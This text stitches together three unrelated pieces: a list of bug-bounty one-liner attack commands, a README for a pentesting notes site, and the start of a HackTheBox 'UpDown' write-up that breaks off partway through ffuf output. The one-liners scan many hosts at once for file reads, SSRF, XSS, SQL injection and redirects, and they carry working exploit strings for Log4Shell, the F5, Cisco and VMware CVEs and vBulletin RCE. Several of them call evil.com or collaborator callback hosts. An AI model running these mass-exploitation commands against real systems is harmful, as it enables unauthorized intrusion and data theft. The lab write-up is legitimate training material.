waybackurls target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
```
```
cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n";done
```
```
gau http://target.com | gf lfi | qsreplace "/etc/passwd" | httpx -t 250 -mr "root:x"
```
----------------------
## Open Redirect:
```
waybackurls target.com | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I| grep "http://evil.com" && echo -e "$host \033[0;31mVulnerable\n" ;done
```
```
export LHOST="URL"; waybackurls $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
```
```
cat subs.txt| waybackurls | gf redirect | qsreplace 'http://example.com' | httpx -fr -title -match-string 'Example Domain'
```
-----------------------
## SSRF:
```
cat wayback.txt | gf ssrf | sort -u |anew | httpx | qsreplace 'burpcollaborator_link' | xargs -I % -P 25 sh -c 'curl -ks "%" 2>&1 | grep "compute.internal" && echo "SSRF VULN! %"'
```
```
cat file.txt | while read host do;do curl --path-as-is --insecure "$host/?unix:(7701 A's here) | "https://bugbounty.requestcatcher.com/ssrf" | grep "request caught" && echo "$host \033[0;31mVuln\n" || echo "$host \033[0;32mNot\n";done
```
```
cat wayback.txt | grep "=" | qsreplace "burpcollaborator_link" >> ssrf.txt; ffuf -c -w ssrf.txt -u FUZZ
```
----------------
## XSS:
```
cat domains.txt | waybackurls | grep -Ev "\.(jpeg|jpg|png|ico)$" | uro | grep = | qsreplace "<img src=x onerror=alert(1)>" | httpx -silent -nc -mc 200 -mr "<img src=x onerror=alert(1)>"
```
```
gau target.com grep '='| qsreplace hack\" -a | while read url;do target-$(curl -s -l $url | egrep -o '(hack" | hack\\")'); echo -e "Target : \e[1;33m $url\e[om" "$target" "\n -"; done I sed 's/hack"/[xss Possible] Reflection Found/g'
```
```
cat hosts.txt | httpx -nc -t 300 -p 80,443,8080,8443 -silent -path "/?name={{this.constructor.constructor('alert(\"foo\")')()}}" -mr "name={{this.constructor.constructor('alert("
```
```
cat targets.txt | waybackurls | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipe
```
```
waybackurls target.com | grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done
```
```
cat urls.txt | grep "=" | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | tee testxss.txt ; dalfox file testxss.txt -b yours.xss.ht
```
```
echo target.com | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq (freq or Airixss)
```
```
cat targets.txt | ffuf -w - -u "FUZZ/sign-in?next=javascript:alert(1);" -mr "javascript:alert(1)"
```
```
waybackurls target.com | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b hacker.xss.ht pipe > output.txt
```
```
cat subs.txt | awk '{print $3}'| httpx -silent | xargs -I@ sh -c 'python3 http://xsstrike.py -u @ --crawl'
```
---------------------
## Hidden Dirs:
```
dirsearch -l urls.txt -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json --deep-recursive --force-recursive --exclude-sizes=0B --random-agent --full-url -o output.txt
```
```
for URL in $(<targets.txt); do ( ffuf -u "${URL}/FUZZ" -w wordlists.txt -ac ); done
```
```
ffuf -c -u target.com -H "Host: FUZZ" -w wordlist.txt
```
**Search for Sensitive files from Wayback**
```
waybackurls domain.com| grep - -color -E "1.xls | \\. xml | \\.xlsx | \\.json | \\. pdf | \\.sql | \\. doc| \\.docx | \\. pptx| \\.txt"
```
```
cat hosts.txt | httpx -nc -t 300 -p 80,443,8080,8443 -silent -path "/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml" -mc 200
```
-------------------
## SQLi:
```
cat subs.txt | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli -batch --random-agent --level 5 --risk 3
```
----------------
## CORS:
```
gau "http://target.com" | while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
```
---------------
## Prototype Pollution:
```
subfinder -d target.com -all -silent | httpx -silent -threads 300 | anew -q alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"
```
-------------
## CVEs:
### CVE-2020-5902:
```
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
```
### CVE-2020-3452:
```
while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < domain_list.txt
```
### CVE-2021-44228:
```
cat subdomains.txt | while read host do; do curl -sk --insecure --path-as-is "$host/?test=${jndi:ldap://log4j.requestcatcher.com/a}" -H "X-Api-Version: ${jndi:ldap://log4j.requestcatcher.com/a}" -H "User-Agent: ${jndi:ldap://log4j.requestcatcher.com/a}";done
```
```
cat urls.txt | sed `s/https:///` | xargs -I {} echo `{}/${jndi:ldap://{}attacker.burpcollab.net}` >> lo4j.txt
```
### CVE-2022-0378:
```
cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done
```
### CVE-2022-22954:
```
cat urls.txt | while read h do ; do curl -sk --path-as-is “$h/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/hosts")}”| grep "context" && echo "$h\033[0;31mV\n"|| echo "$h \033[0;32mN\n";done
```
---------
## RCE:
```
cat targets.txt | httpx -path "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id" -nc -ports 80,443,8080,8443 -mr "uid=" -silent
```
### vBulletin 5.6.2
```
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
```
```
subfinder -d target.com | httpx | gau | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt; ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080
```
-----------
## JS Files:
### Find JS Files:
```
gau -subs target.com |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt
```
```
assetfinder target.com | waybackurls | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"
```
### Hidden Params in JS:
```
cat subdomains.txt | gauplus -subs -t 100 -random-agent | sort -u --version-sort | httpx -silent -threads 2000 | grep -Eiv '(.eot|.jpg|.jpeg|.gif|.css|.tif|.tiff|.png|.ttf|.otf|.woff|.woff2|.ico|.svg|.txt|.pdf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -Eiv '\.js$|([^.]+)\.js|([^.]+)\.js\.[0-9]+$|([^.]+)\.js[0-9]+$|([^.]+)\.js[a-z][A-Z][0-9]+$' | sed 's/.*/&=FUZZ/g'); echo -e "\e[1;33m$url\e[1;32m$vars";done
```
### Extract sensitive end-point in JS:
```
cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u
```
-------------------------
### SSTI:
```
for url in $(cat targets.txt); do python3 tplmap.py -u $url; print $url; done
```
---------------------------
## HeartBleed
```
cat urls.txt | while read line ; do echo "QUIT" | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line; safe; done
```
------------------
## Scan IPs
```
cat my_ips.txt | xargs -L100 shodan scan submit --wait 0
```
## Portscan
```
naabu -1 target.txt -rate 3000 -retries 1 -warm-up-time 0 -c 50 -ports 1-65535 -silent -o out.txt
```
## Screenshots using Nuclei
```
nuclei -l target.txt -headless -t nuclei-templates/headless/screenshot.yaml -v
```
## IPs from CIDR
```
echo cidr | httpx -t 100 | nuclei -t ~/nuclei-templates/ssl/ssl-dns-names.yaml | cut -d " " -f7 | cut -d "]" -f1 | sed 's/[//' | sed 's/,/\n/g' | sort -u
```
## SQLmap Tamper Scripts - WAF bypass
```
sqlmap -u 'http://www.site.com/search.cmd?form_state=1' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords --no-cast --no-escape --dbs --random-agent
```
> **More Scripts Coming Sooon :)**
__________________________________________________________________________________________________________________________________________________________________
<h3 align="left">Support:</h3>
<p><a href="https://www.buymeacoffee.com/litt1eb0y"> <img align="left" src="https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png" height="50" width="210" alt="litt1eb0y" /></a></p>
|
---
description: >-
A collection of notes for Penetration Testers and Ethical Hackers. My journey
to OSCP and beyond.
---
# Hacker's Rest
These are my publicly accessible notes from various sources for penetration testing, red-teaming, OSCP, Capture the Flag (CTF) challenges, and my [Vulnhub](https://www.vulnhub.com/)/ [Hack the Box](https://hackthebox.eu) machine [write-ups](https://zweilosec.github.io/).
{% hint style="warning" %}
Warning - These notes are largely unformatted right now. They are based on my way of learning things - by reading, doing, studying, exploring, and taking notes. Cleaning up and formatting comes later.
* Do not assume anything from these notes.
* Do not expect the notes to be exhaustive, or to cover the techniques or the output they produce in full.
* Expect mistakes in the notes.
* Feel free to ask questions!
* Always consult additional resources. If possible I will try to link to outside resources. _If I have shared something of yours and you want credit, please let me know!_
{% endhint %}
## Contribution
**If you would like to add to, modify, or improve anything in my notes, PLEASE DO!**
If you would like to give suggestions or even commit changes to these pages feel free to head to my GitHub page at:
{% embed url="https://github.com/zweilosec/Infosec-Notes" %}
### How to contribute
1. [Create an Issue Request](https://github.com/zweilosec/Infosec-Notes/issues) describing your changes/additions.
2. Fork [this repository](https://github.com/zweilosec/Infosec-Notes).
3. Push some code to your fork.
4. Come back to this repository and [open a pull request](https://github.com/zweilosec/Infosec-Notes/pulls).
5. After reviewing your changes, I will merge your pull request to the master repository.
6. Make sure to update your Issue Request so that I can credit you! Thank you so much!
Feel free to also open an issue with any questions, help wanted, or requests! Throughout these notes I have put `TODO:` notes that indicate that I know a certain section needs work. Focus on these if you can!
```bash
TODO: Change all code examples to use variables (e.g. $host_ip)
rather than fill-in-the-blank format (e.g. <host_ip>).
This will help greatly with copying code directly into scripts.
```
## Contents
The following sub-pages of these notes will explore some of the common offensive and defensive security techniques including gaining shells, code execution, lateral movement, persistence, scripting, tools and much more. I also cover techniques for dealing with CTF-type challenges such as cryptography, reverse engineering, steganography and more.
{% hint style="success" %}
Hack Responsibly.
Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}
### Linux
* [Linux Basics](linux-1/linux-basics.md)
* [Hardening & Configuration Guide ](linux-1/linux-hardening/)
* [TMUX/Screen Cheatsheet](linux-1/linux-hardening/tmux-screen-cheatsheet.md)
* [Red Team Notes](linux-1/linux-redteam/)
* [Enumeration](linux-1/linux-redteam/enumeration.md)
* [Getting Access](linux-1/linux-redteam/getting-access.md)
* [Privilege Escalation](linux-1/linux-redteam/privilege-escalation.md)
* [Exfiltration](linux-1/linux-redteam/exfiltration.md)
* [Persistence](linux-1/linux-redteam/persistance.md)
* [Vim](linux-1/vim.md)
### Windows
* [Windows Basics](windows-1/windows-basics.md)
* [Hardening & Configuration Guide](windows-1/windows-hardening.md)  
* [Red Team Notes](windows-1/windows-redteam/)
* [Enumeration](windows-1/windows-redteam/enumeration.md)
* [Getting Access](windows-1/windows-redteam/getting-access.md)
* [Privilege Escalation](windows-1/windows-redteam/privilege-escalation.md)
* [Persistence](windows-1/windows-redteam/persistence.md)
* [Active Directory](windows-1/windows-redteam/active-directory/)
* [PowerShell](windows-1/powershell.md)
### MacOS
* [MacOS Basics](macos/macos-basics.md)
* [Hardening & Configuration Guide](macos/macos-hardening.md)
* [Red Team Notes](macos/macos-redteam/)
* [Enumeration](macos/macos-redteam/enumeration.md)
* [Getting Access](macos/macos-redteam/getting-access.md)
* [Privilege Escalation](macos/macos-redteam/privilege-escalation.md)
* [Persistence](macos/macos-redteam/persistence.md)
### Web
* [DNS](web/dns.md)
* [Subdomain/Virtual Host Enumeration](web/web-notes/subdomain-virtual-host-enumeration.md)
* [Web Apps](web/web-notes/)
* [Web Application Hacker's Handbook Task Checklist](web/web-notes/the-web-application-hackers-handbook.md)
### Mobile
* [iOS](mobile/ios.md)
* [Android](mobile/android.md)
### OS Agnostic
* [Cryptography & Encryption](os-agnostic/password-cracking/)
* [Network Hardware](os-agnostic/network-hardware.md)
* [OS Agnostic](os-agnostic/os\_agnostic.md)
* [OSINT](os-agnostic/osint.md)
* [Password Cracking](os-agnostic/password-cracking/)
* [Gathering the Hashes](os-agnostic/password-cracking/gathering-the-hashes.md)
* [Wordlist Generation](os-agnostic/password-cracking/wordlist-manipulation.md)
* [Cracking the Hashes](os-agnostic/password-cracking/cracking-the-hashes.md)
* [Reverse Engineering & Binary Exploitation](os-agnostic/reverse-engineering-and-binary-exploitation/)
* [Buffer Overflow](os-agnostic/reverse-engineering-and-binary-exploitation/buffer-overflow.md)
* [Scripting](os-agnostic/scripting/)
* [Scripting Language Syntax Comparison](os-agnostic/scripting/script-language-comparison.md)
* [SQL](os-agnostic/sql.md)
* [SSH & SCP](os-agnostic/ssh-and-scp.md)
* [Steganography](os-agnostic/steganography.md)
* [Wireless](os-agnostic/wifi.md)
### Unsorted
* [Unsorted Notes](untitled.md)
## OSCP/CTF Tools and Cheatsheets
See my [list of outside sources](tools-cheatsheets/)!
If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
|
# UpDown - HackTheBox - Writeup
Linux, 30 Base Points, Medium
![info.JPG](images/info.JPG)
## Machine
![UpDown.JPG](images/UpDown.JPG)
## TL;DR
To solve this machine, we start by using `nmap` to enumerate open services and find ports `22` and `80`.
***User***: Discovered virtual host `dev.siteisup.htb` and directory `/dev/.git`. Found that `Special-Dev: only4dev` HTTP header must be added to access `dev.siteisup.htb`. Uploaded `.phar` file, gained a reverse shell as `www-data` user. Found SUID for `developer` user that runs `python2` script with `input()` function, used `input()` to execute python code and obtained the SSH private key of `developer` user.
***Root***: By running `sudo -l` found that `usr/local/bin/easy_install` can be run as `root` and if the binary is allowed to run as superuser by `sudo`, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. Using that, a shell as `root` was obtained.
![pwn.JPG](images/pwn.JPG)
## UpDown Solution
### User
Let's begin by using `nmap` to scan the target machine:
```console
┌─[evyatar9@parrot]─[/hackthebox/UpDown]
└──╼ $ nmap -sV -sC -oA nmap/UpDown 10.10.11.177
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-16 21:43 IST
Nmap scan report for 10.10.11.177
Host is up (0.072s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
| 256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_ 256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Observing port `80`, we see that the following web page is hosted:
![port80.JPG](images/port80.JPG)
We have discovered the domain `siteisup.htb` and added it to `/etc/hosts`.
Using the tool `gobuster`, we found the following virtual host:
```console
┌─[evyatar9@parrot]─[/hackthebox/UpDown]
└──╼ $ gobuster vhost -u siteisup.htb -w /subdomains-top1milion.txt -o vhosts.gobuster -t 100
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://siteisup.htb
[+] Method: GET
[+] Threads: 100
[+] Wordlist: subdomains-top1milion.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/11/16 21:50:27 Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.siteisup.htb (Status: 403) [Size: 281]
```
We have also added `dev.siteisup.htb` to `/etc/hosts`. By re-running `gobuster`, we have discovered the following paths:
```console
┌─[evyatar9@parrot]─[/hackthebox/UpDown]
└──╼ $ gobuster dir -u http://siteisup.htb/ -x php -w raft-medium-words.txt -t 100 -k --wildcard -o preprod.gobuster
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://siteisup.htb/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: raft-medium-words.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2022/11/17 23:14:11 Starting gobuster in directory enumeration mode
===============================================================
...
/dev (Status: 301) [Size: 310] [--> http://siteisup.htb/dev/
...
/server-status (Status: 403) [Size: 277]
```
Let's re-run `gobuster` on [http://siteisup.htb/dev](http://siteisup.htb/dev) again::
```console
┌─[evyatar9@parrot]─[/hackthebox/UpDown]
└──╼ $ gobuster dir -u http://siteisup.htb/dev -x php -w raft-medium-words.txt -t 100 -k --wildcard -o preprod.gobuster
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://siteisup.htb/dev
[+] Method: GET
[+] Threads: 100
[+] Wordlist: raft-medium-words.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2022/11/17 23:14:29 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 0]
/. (Status: 200) [Size: 0]
/.git (Status: 301) [Size: 315] [--> http://siteisup.htb/dev/.git/]
===============================================================
2022/11/17 23:16:47 Finished
===============================================================
```
By browsing to [http://siteisup.htb/dev/.git](http://siteisup.htb/dev/.git) we can see the following::
![devgit.JPG](images/devgit.JPG)
We will proceed to download the entire directory:
```console
┌─[evyatar9@parrot]─[/hackthebox/UpDown]
└──╼ $ wget --no-parent -r http://siteisup.htb/dev/.git/
...
┌─[evyatar9@parrot]─[/hackthebox/UpDown]
└──╼ $ ls -ltra
.git
```
By executing the command `git log"`, we can view the following information:
```console
┌─[evyatar9@parrot]─[/hackthebox/UpDown]
└──╼ $ git log
commit c8fcc4032487eaf637d41486eb150b7182ecd1f1 (HEAD)
Author: Abdou.Y <[email protected]>
Date: Wed Oct 20 19:38:08 2021 +0200
Update checker.php
commit f67efd00c10784ae75bd251add3d52af50d7addd
Author: Abdou.Y <[email protected]>
Date: Wed Oct 20 18:33:11 2021 +0200
Create checker.php
commit ab9bc164b4103de3c12ac97152e6d63040d5c4c6
Author: Abdou.Y <[email protected]>
Date: Wed Oct 20 18:30:58 2021 +0200
Update changelog.txt
commit 60d2b3280d5356fe0698561e8ef8991825fec6cb
Author: Abdou.Y <[email protected]>
Date: Wed Oct 20 18:30:39 2021 +0200
Create admin.php
commit c1998f8fbe683dd0bee8d94167bb896bd926c4c7
Author: Abdou.Y <[email protected]>
Date: Wed Oct 20 18:29:45 2021 +0200
Add admin panel.
commit 35a380176ff228067def9c2ecc52ccfe705de640
Author: Abdou.Y <[email protected]>
Date: Wed Oct 20 17:40:49 2021 +0200
Update changelog.txt
commit 57af03ba60cdcfe443e92c33c188c6cecb70eb10
Author: Abdou.Y <[email protected]>
Date: Wed Oct 20 17:29:42 2021 +0200
Create index.php
commit 354fe069f6205af09f26c99cfe2457dea3eb6a6c
Author: Abdou.Y <[email protected]>
Date: Wed Oct 20 17:28:48 2021 +0200
Delete .htpasswd
commit 8812785e31c879261050e72e20f298ae8c43b565
Author: Abdou.Y <[email protected]>
Date: Wed Oct 20 16:38:54 2021 +0200
New technique in header to protect our dev vhost.
commit bc4ba79e596e9fd98f1b2837b9bd3548d04fe7ab
Author: Abdou.Y <[email protected]>
Date: Wed Oct 20 16:37:20 2021 +0200
Update .htaccess
New technique in header to protect our dev vhost.
commit 61e5cc0550d44c08b6c316d4f04d3fcc7783ae71
Author: Abdou.Y <[email protected]>
Date: Wed Oct 20 15:45:48 2021 +0200
Update index.php
commit 3d66cd48933b35f4012066bcc7ee8d60f0069926
Author: Abdou.Y <[email protected]>
Date: Wed Oct 20 15:45:18 2021 +0200
Create changelog.txt
commit 4fb192727c29c158a659911aadcdcc23e4decec5
Author: Abdou.Y <[email protected]>
Date: Wed Oct 20 15:28:26 2021 +0200
Create stylesheet.css
commit 6f89af70fd23819664dd28d764f13efc02ecfd88
Author: Abdou.Y <[email protected]>
Date: Wed Oct 20 15:05:40 2021 +0200
Create index.php
commit 8d1beb1cf5a1327c4cdb271b8efb1599b1b1c87f
Author: Abdou.Y <[email protected]>
Date: Wed Oct 20 15:05:08 2021 +0200
Create .htpasswd
commit 6ddcc7a8ac393edb7764788c0cbc13a7a521d372
Author: Abdou.Y <[email protected]>
Date: Wed Oct 20 15:04:38 2021 +0200
Create .htaccess
```
We can see the commits and by running the command `git checkout c8fcc4032487eaf637d41486eb150b7182ecd1f1`, we can access the last commit:
```console
┌─[evyatar9@parrot]─[/hackthebox/UpDown]
└──╼ $ ls -ltra
total 22
drwxrwx--- 1 root vboxsf 0 Nov 17 23:26 ..
-rwxrwx--- 1 root vboxsf 5531 Nov 17 23:29 stylesheet.css
-rwxrwx--- 1 root vboxsf 117 Nov 17 23:32 .htaccess
-rwxrwx--- 1 root vboxsf 59 Nov 17 23:33 admin.php
-rwxrwx--- 1 root vboxsf 147 Nov 17 23:33 changelog.txt
-rwxrwx--- 1 root vboxsf 273 Nov 17 23:33 index.php
drwxrwx--- 1 root vboxsf 0 Nov 17 23:33 uploads
-rwxrwx--- 1 root vboxsf 3145 Nov 17 23:36 checker.php
drwxrwx--- 1 root vboxsf 4096 Nov 17 23:36 .
drwxrwx--- 1 root vboxsf 4096 Nov 17 23:36 .git
```
Let's examine the file `.htaccess`:
```console
┌─[evyatar9@parrot]─[/hackthebox/UpDown]
└──╼ $ cat .htaccess
SetEnvIfNoCase Special-Dev "only4dev" Required-Header
Order Deny,Allow
Deny from All
Allow from env=Required-Header
```
As we can see, the `dev` subdomain can only be accessed if we include the HTTP header `Special-Dev: only4dev`.
We can intercept the request to [http://dev.siteisup.htb/](http://dev.siteisup.htb/) and observe the following::
![specialheader.JPG](images/specialheader.JPG)
And now we are able to access the following webpage:
![devpage.JPG](images/devpage.JPG)
This page is `checker.php`, let's examine this file:
```php
cat checker.php
<?php
if(DIRECTACCESS){
die("Access Denied");
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset='utf-8' />
<meta http-equiv="X-UA-Compatible" content="chrome=1" />
<link rel="stylesheet" type="text/css" media="screen" href="stylesheet.css">
<title>Is my Website up ? (beta version)</title>
</head>
<body>
<div id="header_wrap" class="outer">
<header class="inner">
<h1 id="project_title">Welcome,<br> Is My Website UP ?</h1>
<h2 id="project_tagline">In this version you are able to scan a list of websites !</h2>
</header>
</div>
<div id="main_content_wrap" class="outer">
<section id="main_content" class="inner">
<form method="post" enctype="multipart/form-data">
<label>List of websites to check:</label><br><br>
<input type="file" name="file" size="50">
<input name="check" type="submit" value="Check">
</form>
<?php
function isitup($url){
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, trim($url));
curl_setopt($ch, CURLOPT_USERAGENT, "siteisup.htb beta");
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$f = curl_exec($ch);
$header = curl_getinfo($ch);
if($f AND $header['http_code'] == 200){
return array(true,$f);
}else{
return false;
}
curl_close($ch);
}
if($_POST['check']){
# File size must be less than 10kb.
if ($_FILES['file']['size'] > 10000) {
die("File too large!");
}
$file = $_FILES['file']['name'];
# Check if extension is allowed.
$ext = getExtension($file);
if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext)){
die("Extension not allowed!");
}
# Create directory to upload our file.
$dir = "uploads/".md5(time())."/";
if(!is_dir($dir)){
mkdir($dir, 0770, true);
}
# Upload the file.
$final_path = $dir.$file;
move_uploaded_file($_FILES['file']['tmp_name'], "{$final_path}");
# Read the uploaded file.
$websites = explode("\n",file_get_contents($final_path));
foreach($websites as $site){
$site=trim($site);
if(!preg_match("#file://#i",$site) && !preg_match("#data://#i",$site) && !preg_match("#ftp://#i",$site)){
$check=isitup($site);
if($check){
echo "<center>{$site}<br><font color='green'>is up ^_^</font></center>";
}else{
echo "<center>{$site}<br><font color='red'>seems to be down :(</font></center>";
}
}else{
echo "<center><font color='red'>Hacking attempt was detected !</font></center>";
}
}
# Delete the uploaded file.
@unlink($final_path);
}
function getExtension($file) {
$extension = strrpos($file,".");
return ($extension===false) ? "" : substr($file,$extension+1);
}
?>
</section>
</div>
<div id="footer_wrap" class="outer">
<footer class="inner">
<p class="copyright">siteisup.htb (beta)</p><br>
<a class="changelog" href="changelog.txt">changelog.txt</a><br>
</footer>
</div>
</body>
</html>
```
We can see that there is an extension filter present:
```php
if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext)){
die("Extension not allowed!");
}
```
Let's use the tool [ffuf](https://github.com/ffuf/ffuf) to determine which file extensions can be uploaded.
First, we'll save the uploaded file and check the HTTP request to the file:
```HTTP
POST / HTTP/1.1
Host: dev.siteisup.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://dev.siteisup.htb/
Content-Type: multipart/form-data; boundary=---------------------------400346544333176877002266488658
Content-Length: 382
Origin: http://dev.siteisup.htb
DNT: 1
Special-Dev: only4dev
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------400346544333176877002266488658
Content-Disposition: form-data; name="file"; filename="myfileFUZZ"
Content-Type: application/octet-stream
test
-----------------------------400346544333176877002266488658
Content-Disposition: form-data; name="check"
Check
-----------------------------400346544333176877002266488658--
```
As you can see, I have modified the filename from `filename="myfile.txt"` to `filename="myfileFUZZ"` for `ffuf`.
To test the HTTP response length, we need to create a wordlist with a few extensions, one of which is not an allowed extension:
```console
┌─[evyatar9@parrot]─[/hackthebox/UpDown]
└──╼ $ cat extentions.txt
.php
.txt
.test
┌─[evyatar9@parrot]─[/hackthebox/UpDown]
└──╼ $ ./ffuf -request req -request-proto http -w extentions.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0-dev
________________________________________________
:: Method : POST
:: URL : http://dev.siteisup.htb/
:: Wordlist : FUZZ: extentions.txt
:: Header : Special-Dev: only4dev
:: Header : Upgrade-Insecure-Requests: 1
:: Header : Host: dev.siteisup.htb
:: Header : Accept-Encoding: gzip, deflate
:: Header : Referer: http://dev.siteisup.htb/
:: Header : Origin: http://dev.siteisup.htb
:: Header : DNT: 1
